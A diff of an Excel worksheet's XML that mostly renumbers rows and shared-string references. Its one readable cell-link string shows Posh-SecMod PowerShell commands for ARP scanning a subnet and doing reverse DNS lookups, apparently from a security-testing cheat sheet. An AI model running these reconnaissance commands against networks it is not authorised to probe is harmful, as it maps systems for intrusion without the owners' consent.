-    <row r="283" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B283" s="24" t="s">
-        <v>542</v>
-      </c>
-      <c r="C283" s="49" t="s">
-        <v>544</v>
-      </c>
-      <c r="D283" s="46" t="s">
-        <v>545</v>
-      </c>
-    </row>
-    <row r="284" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B284" s="24" t="s">
-        <v>546</v>
-      </c>
-      <c r="C284" s="66"/>
-      <c r="D284" s="65" t="s">
-        <v>571</v>
-      </c>
-    </row>
-    <row r="285" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B285" s="24" t="s">
-        <v>547</v>
-      </c>
-      <c r="C285" s="66" t="s">
-        <v>573</v>
-      </c>
-      <c r="D285" s="65" t="s">
-        <v>572</v>
-      </c>
-    </row>
-    <row r="286" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B286" s="53" t="s">
-        <v>532</v>
-      </c>
-      <c r="C286" s="10"/>
-      <c r="D286" s="34"/>
-    </row>
-    <row r="287" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B287" s="24" t="s">
-        <v>501</v>
-      </c>
-      <c r="C287" s="49"/>
-      <c r="D287" s="46" t="s">
-        <v>533</v>
-      </c>
-    </row>
-    <row r="288" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B288" s="24" t="s">
-        <v>534</v>
-      </c>
-      <c r="C288" s="24"/>
-      <c r="D288" s="27" t="s">
-        <v>535</v>
-      </c>
-    </row>
-    <row r="289" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B289" s="24" t="s">
-        <v>536</v>
-      </c>
-      <c r="C289" s="24"/>
-      <c r="D289" s="27" t="s">
-        <v>537</v>
-      </c>
-    </row>
-    <row r="290" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B290" s="24" t="s">
-        <v>538</v>
-      </c>
-      <c r="C290" s="24"/>
-      <c r="D290" s="27" t="s">
-        <v>539</v>
-      </c>
-    </row>
-    <row r="291" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D291" s="19"/>
-    </row>
-    <row r="292" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D292" s="19"/>
-    </row>
-    <row r="293" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B293" s="53" t="s">
-        <v>509</v>
-      </c>
-      <c r="C293" s="10" t="s">
-        <v>117</v>
-      </c>
-      <c r="D293" s="34" t="s">
-        <v>1</v>
-      </c>
-    </row>
-    <row r="294" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B294" s="24" t="s">
-        <v>523</v>
-      </c>
-      <c r="C294" s="49" t="s">
-        <v>511</v>
-      </c>
-      <c r="D294" s="46" t="s">
-        <v>510</v>
-      </c>
-    </row>
-    <row r="295" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B295" s="24" t="s">
-        <v>520</v>
-      </c>
-      <c r="C295" s="26" t="s">
-        <v>512</v>
-      </c>
-      <c r="D295" s="27" t="s">
-        <v>513</v>
-      </c>
-    </row>
-    <row r="296" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B296" s="24" t="s">
-        <v>521</v>
-      </c>
-      <c r="C296" s="26"/>
-      <c r="D296" s="27" t="s">
-        <v>514</v>
-      </c>
-    </row>
-    <row r="297" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B297" s="24" t="s">
-        <v>519</v>
-      </c>
-      <c r="C297" s="26"/>
-      <c r="D297" s="27" t="s">
-        <v>515</v>
-      </c>
-    </row>
-    <row r="298" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B298" s="24" t="s">
-        <v>522</v>
-      </c>
-      <c r="C298" s="26"/>
-      <c r="D298" s="27" t="s">
-        <v>518</v>
-      </c>
-    </row>
-    <row r="299" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B299" s="24" t="s">
-        <v>517</v>
-      </c>
-      <c r="C299" s="26"/>
-      <c r="D299" s="27" t="s">
-        <v>516</v>
-      </c>
-    </row>
-    <row r="300" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D300" s="19"/>
-    </row>
-    <row r="301" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B301" s="53" t="s">
-        <v>500</v>
-      </c>
-      <c r="C301" s="10" t="s">
-        <v>117</v>
-      </c>
-      <c r="D301" s="34" t="s">
-        <v>1</v>
-      </c>
-    </row>
-    <row r="302" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B302" s="24" t="s">
-        <v>524</v>
-      </c>
-      <c r="C302" s="49" t="s">
-        <v>502</v>
-      </c>
-      <c r="D302" s="46"/>
-    </row>
-    <row r="303" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B303" s="24" t="s">
-        <v>505</v>
-      </c>
-      <c r="C303" s="24"/>
-      <c r="D303" s="27" t="s">
-        <v>503</v>
-      </c>
-    </row>
-    <row r="304" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B304" s="24" t="s">
-        <v>504</v>
-      </c>
-      <c r="C304" s="24"/>
-      <c r="D304" s="27" t="s">
-        <v>506</v>
       </c>
     </row>
     <row r="305" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B305" s="24" t="s">
-        <v>508</v>
-      </c>
-      <c r="C305" s="24"/>
-      <c r="D305" s="27" t="s">
-        <v>507</v>
+        <v>587</v>
+      </c>
+      <c r="C305" s="49"/>
+      <c r="D305" s="46" t="s">
+        <v>581</v>
       </c>
     </row>
     <row r="306" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B306" s="53" t="s">
-        <v>525</v>
-      </c>
-      <c r="C306" s="10" t="s">
-        <v>117</v>
-      </c>
-      <c r="D306" s="34" t="s">
-        <v>1</v>
+      <c r="B306" s="24" t="s">
+        <v>582</v>
+      </c>
+      <c r="C306" s="49"/>
+      <c r="D306" s="46" t="s">
+        <v>583</v>
       </c>
     </row>
     <row r="307" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B307" s="24" t="s">
-        <v>528</v>
-      </c>
-      <c r="C307" s="26" t="s">
         <v>526</v>
       </c>
-      <c r="D307" s="27" t="s">
-        <v>527</v>
+      <c r="C307" s="49"/>
+      <c r="D307" s="46" t="s">
+        <v>525</v>
       </c>
     </row>
     <row r="308" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B308" s="21"/>
-      <c r="C308" s="68"/>
-      <c r="D308" s="33"/>
+      <c r="B308" s="24" t="s">
+        <v>535</v>
+      </c>
+      <c r="C308" s="24"/>
+      <c r="D308" s="18" t="s">
+        <v>580</v>
+      </c>
     </row>
     <row r="309" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B309" s="21"/>
-      <c r="C309" s="68"/>
-      <c r="D309" s="33"/>
+      <c r="B309" s="24" t="s">
+        <v>538</v>
+      </c>
+      <c r="C309" s="49"/>
+      <c r="D309" s="46" t="s">
+        <v>536</v>
+      </c>
     </row>
     <row r="310" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B310" s="53" t="s">
-        <v>330</v>
-      </c>
-      <c r="C310" s="10" t="s">
-        <v>117</v>
-      </c>
-      <c r="D310" s="34" t="s">
-        <v>1</v>
+      <c r="B310" s="24" t="s">
+        <v>537</v>
+      </c>
+      <c r="C310" s="49" t="s">
+        <v>539</v>
+      </c>
+      <c r="D310" s="46" t="s">
+        <v>540</v>
       </c>
     </row>
     <row r="311" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B311" s="40" t="s">
-        <v>331</v>
-      </c>
-      <c r="C311" s="44" t="s">
-        <v>497</v>
-      </c>
-      <c r="D311" s="27" t="s">
-        <v>424</v>
+      <c r="B311" s="24" t="s">
+        <v>541</v>
+      </c>
+      <c r="C311" s="66"/>
+      <c r="D311" s="65" t="s">
+        <v>566</v>
       </c>
     </row>
     <row r="312" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B312" s="40" t="s">
-        <v>332</v>
-      </c>
-      <c r="C312" s="24"/>
-      <c r="D312" s="18" t="s">
-        <v>619</v>
+      <c r="B312" s="24" t="s">
+        <v>542</v>
+      </c>
+      <c r="C312" s="66" t="s">
+        <v>568</v>
+      </c>
+      <c r="D312" s="65" t="s">
+        <v>567</v>
       </c>
     </row>
     <row r="313" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B313" s="53" t="s">
+        <v>527</v>
+      </c>
+      <c r="C313" s="10"/>
+      <c r="D313" s="34"/>
+    </row>
+    <row r="314" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B314" s="24" t="s">
+        <v>497</v>
+      </c>
+      <c r="C314" s="49"/>
+      <c r="D314" s="46" t="s">
+        <v>528</v>
+      </c>
+    </row>
+    <row r="315" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B315" s="24" t="s">
+        <v>529</v>
+      </c>
+      <c r="C315" s="24"/>
+      <c r="D315" s="27" t="s">
+        <v>530</v>
+      </c>
+    </row>
+    <row r="316" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B316" s="24" t="s">
+        <v>531</v>
+      </c>
+      <c r="C316" s="24"/>
+      <c r="D316" s="27" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="317" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B317" s="24" t="s">
+        <v>533</v>
+      </c>
+      <c r="C317" s="24"/>
+      <c r="D317" s="27" t="s">
+        <v>534</v>
+      </c>
+    </row>
+    <row r="318" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B318" s="53" t="s">
+        <v>505</v>
+      </c>
+      <c r="C318" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D318" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="319" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B319" s="24" t="s">
+        <v>519</v>
+      </c>
+      <c r="C319" s="49" t="s">
+        <v>507</v>
+      </c>
+      <c r="D319" s="46" t="s">
+        <v>506</v>
+      </c>
+    </row>
+    <row r="320" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B320" s="24" t="s">
+        <v>516</v>
+      </c>
+      <c r="C320" s="26" t="s">
+        <v>508</v>
+      </c>
+      <c r="D320" s="27" t="s">
+        <v>509</v>
+      </c>
+    </row>
+    <row r="321" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B321" s="24" t="s">
+        <v>517</v>
+      </c>
+      <c r="C321" s="26"/>
+      <c r="D321" s="27" t="s">
+        <v>510</v>
+      </c>
+    </row>
+    <row r="322" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B322" s="24" t="s">
+        <v>515</v>
+      </c>
+      <c r="C322" s="26"/>
+      <c r="D322" s="27" t="s">
+        <v>511</v>
+      </c>
+    </row>
+    <row r="323" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B323" s="24" t="s">
+        <v>518</v>
+      </c>
+      <c r="C323" s="26"/>
+      <c r="D323" s="27" t="s">
+        <v>514</v>
+      </c>
+    </row>
+    <row r="324" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B324" s="24" t="s">
+        <v>513</v>
+      </c>
+      <c r="C324" s="26"/>
+      <c r="D324" s="27" t="s">
+        <v>512</v>
+      </c>
+    </row>
+    <row r="325" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B325" s="53" t="s">
+        <v>496</v>
+      </c>
+      <c r="C325" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D325" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="326" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B326" s="24" t="s">
+        <v>520</v>
+      </c>
+      <c r="C326" s="49" t="s">
+        <v>498</v>
+      </c>
+      <c r="D326" s="46"/>
+    </row>
+    <row r="327" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B327" s="24" t="s">
+        <v>501</v>
+      </c>
+      <c r="C327" s="24"/>
+      <c r="D327" s="27" t="s">
+        <v>499</v>
+      </c>
+    </row>
+    <row r="328" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B328" s="24" t="s">
+        <v>500</v>
+      </c>
+      <c r="C328" s="24"/>
+      <c r="D328" s="27" t="s">
+        <v>502</v>
+      </c>
+    </row>
+    <row r="329" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B329" s="24" t="s">
+        <v>504</v>
+      </c>
+      <c r="C329" s="24"/>
+      <c r="D329" s="27" t="s">
+        <v>503</v>
+      </c>
+    </row>
+    <row r="330" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B330" s="53" t="s">
+        <v>521</v>
+      </c>
+      <c r="C330" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D330" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="331" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B331" s="24" t="s">
+        <v>524</v>
+      </c>
+      <c r="C331" s="26" t="s">
+        <v>522</v>
+      </c>
+      <c r="D331" s="27" t="s">
+        <v>523</v>
+      </c>
+    </row>
+    <row r="332" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B332" s="53" t="s">
+        <v>326</v>
+      </c>
+      <c r="C332" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D332" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="333" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B333" s="40" t="s">
+        <v>327</v>
+      </c>
+      <c r="C333" s="44" t="s">
+        <v>493</v>
+      </c>
+      <c r="D333" s="27" t="s">
+        <v>420</v>
+      </c>
+    </row>
+    <row r="334" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B334" s="40" t="s">
+        <v>328</v>
+      </c>
+      <c r="C334" s="24"/>
+      <c r="D334" s="18" t="s">
+        <v>614</v>
+      </c>
+    </row>
+    <row r="335" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B335" s="53" t="s">
+        <v>481</v>
+      </c>
+      <c r="C335" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D335" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="336" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B336" s="40" t="s">
+        <v>487</v>
+      </c>
+      <c r="C336" s="44" t="s">
+        <v>488</v>
+      </c>
+      <c r="D336" s="59" t="s">
+        <v>494</v>
+      </c>
+    </row>
+    <row r="337" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B337" s="40" t="s">
+        <v>486</v>
+      </c>
+      <c r="C337" s="44" t="s">
+        <v>491</v>
+      </c>
+      <c r="D337" s="59" t="s">
+        <v>492</v>
+      </c>
+    </row>
+    <row r="338" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B338" s="40" t="s">
+        <v>482</v>
+      </c>
+      <c r="C338" s="44" t="s">
+        <v>483</v>
+      </c>
+      <c r="D338" s="59" t="s">
+        <v>489</v>
+      </c>
+    </row>
+    <row r="339" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B339" s="40" t="s">
+        <v>484</v>
+      </c>
+      <c r="C339" s="44" t="s">
         <v>485</v>
       </c>
-      <c r="C313" s="10" t="s">
-        <v>117</v>
-      </c>
-      <c r="D313" s="34" t="s">
-        <v>1</v>
-      </c>
-    </row>
-    <row r="314" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B314" s="40" t="s">
-        <v>491</v>
-      </c>
-      <c r="C314" s="44" t="s">
-        <v>492</v>
-      </c>
-      <c r="D314" s="59" t="s">
-        <v>498</v>
-      </c>
-    </row>
-    <row r="315" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B315" s="40" t="s">
+      <c r="D339" s="60" t="s">
         <v>490</v>
       </c>
-      <c r="C315" s="44" t="s">
-        <v>495</v>
-      </c>
-      <c r="D315" s="59" t="s">
-        <v>496</v>
-      </c>
-    </row>
-    <row r="316" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B316" s="40" t="s">
-        <v>486</v>
-      </c>
-      <c r="C316" s="44" t="s">
-        <v>487</v>
-      </c>
-      <c r="D316" s="59" t="s">
-        <v>493</v>
-      </c>
-    </row>
-    <row r="317" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B317" s="40" t="s">
-        <v>488</v>
-      </c>
-      <c r="C317" s="44" t="s">
-        <v>489</v>
-      </c>
-      <c r="D317" s="60" t="s">
-        <v>494</v>
-      </c>
-    </row>
-    <row r="318" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D318" s="19"/>
-    </row>
-    <row r="319" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D319" s="19"/>
-    </row>
-    <row r="322" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D322" s="19"/>
-    </row>
-    <row r="323" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D323" s="19"/>
-    </row>
-    <row r="324" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D324" s="19"/>
-    </row>
-    <row r="325" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D325" s="19"/>
-    </row>
-    <row r="326" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D326" s="19"/>
+    </row>
+    <row r="340" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D340" s="19"/>
+    </row>
+    <row r="341" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D341" s="19"/>
+    </row>
+    <row r="344" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D344" s="19"/>
+    </row>
+    <row r="345" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D345" s="19"/>
+    </row>
+    <row r="346" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D346" s="19"/>
+    </row>
+    <row r="347" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D347" s="19"/>
+    </row>
+    <row r="348" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D348" s="19"/>
     </row>
   </sheetData>
-  <mergeCells count="3">
+  <mergeCells count="6">
     <mergeCell ref="A1:D2"/>
-    <mergeCell ref="A192:D193"/>
-    <mergeCell ref="A273:D274"/>
+    <mergeCell ref="A186:D187"/>
+    <mergeCell ref="A301:D302"/>
+    <mergeCell ref="A200:D201"/>
+    <mergeCell ref="A240:D241"/>
+    <mergeCell ref="A271:D272"/>
   </mergeCells>
   <hyperlinks>
-    <hyperlink ref="D284" display="# Installation:_x000a_   https://github.com/darkoperator/Posh-SecMod_x000a_   _x000a_# PS C:\&gt; Get-Command –Module Posh-SecMod_x000a__x000a_# Posh-SecMod – Invoke-ARPScan _x000a_   PS C:\&gt; Invoke-ARPScan –CIDR 192.168.13.1/24_x000a__x000a_# Posh-SecMod – Invoke-ReverseDNSLookup_x000a_   PS C:\&gt; Invoke-Revers"/>
+    <hyperlink ref="D311" display="# Installation:_x000a_   https://github.com/darkoperator/Posh-SecMod_x000a_   _x000a_# PS C:\&gt; Get-Command –Module Posh-SecMod_x000a__x000a_# Posh-SecMod – Invoke-ARPScan _x000a_   PS C:\&gt; Invoke-ARPScan –CIDR 192.168.13.1/24_x000a__x000a_# Posh-SecMod – Invoke-ReverseDNSLookup_x000a_   PS C:\&gt; Invoke-Revers"/>
   </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.51180555555555496" footer="0.51180555555555496"/>
   <pageSetup paperSize="9" firstPageNumber="0" orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId1"/>
